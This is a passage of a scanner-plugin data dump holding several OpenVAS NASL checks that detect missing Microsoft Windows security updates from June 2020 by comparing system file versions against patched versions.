\"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1317\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n 
script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561612)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561612\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - Multiple errors in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\n\n - An error when the Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content.\n\n - An error when Windows Modules Installer Service improperly handles class object\n members.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information,\n conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561612\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0)\n exit(0);\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"6.2.9200.23063\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:dllVer, vulnerable_range:\"Less than 6.2.9200.23063\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", 
"CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "description": "This host is missing a critical security\n update according to Microsoft KB4561666", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817157", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561666)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817157\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1160\",\n \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1260\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1272\", \"CVE-2020-1281\",\n \"CVE-2020-1282\", \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1317\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561666)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561666\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due 
to:\n\n - Multiple errors in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\n\n - An error when the Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content.\n\n - An error when Windows Modules Installer Service improperly handles class object\n members.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information,\n conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64-based systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561666\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Atl.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_is_less(version:sysVer, test_version:\"3.5.2284.0\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Atl.dll\",\n file_version:sysVer, vulnerable_range:\"Less than 3.5.2284.0\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", 
"CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197"], "description": "This host is missing a critical security\n update according to Microsoft KB4561649", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817143", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561649)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817143\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1197\",\n \"CVE-2020-1202\", \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1234\", \"CVE-2020-1236\", \"CVE-2020-1239\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1278\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1310\", \"CVE-2020-1311\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561649)\");\n\n 
script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561649\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561649\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18607\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18607\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", 
"CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561616", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817146", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561616)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817146\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1197\",\n \"CVE-2020-1202\", \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1211\", \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\",\n \"CVE-2020-1215\", \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1234\",\n \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1259\",\n \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\",\n \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1287\",\n \"CVE-2020-1291\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1309\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n 
script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561616)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561616\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561616\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3749\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3749\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", 
"CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561602", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817141", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561602)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817141\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\", \"CVE-2020-1211\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\",\n \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\",\n \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1258\",\n \"CVE-2020-1259\", \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\",\n \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\",\n \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1278\",\n \"CVE-2020-1279\", \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1283\", \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\",\n \"CVE-2020-1291\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1309\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1312\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\",\n \"CVE-2020-1317\", \"CVE-2020-1324\", 
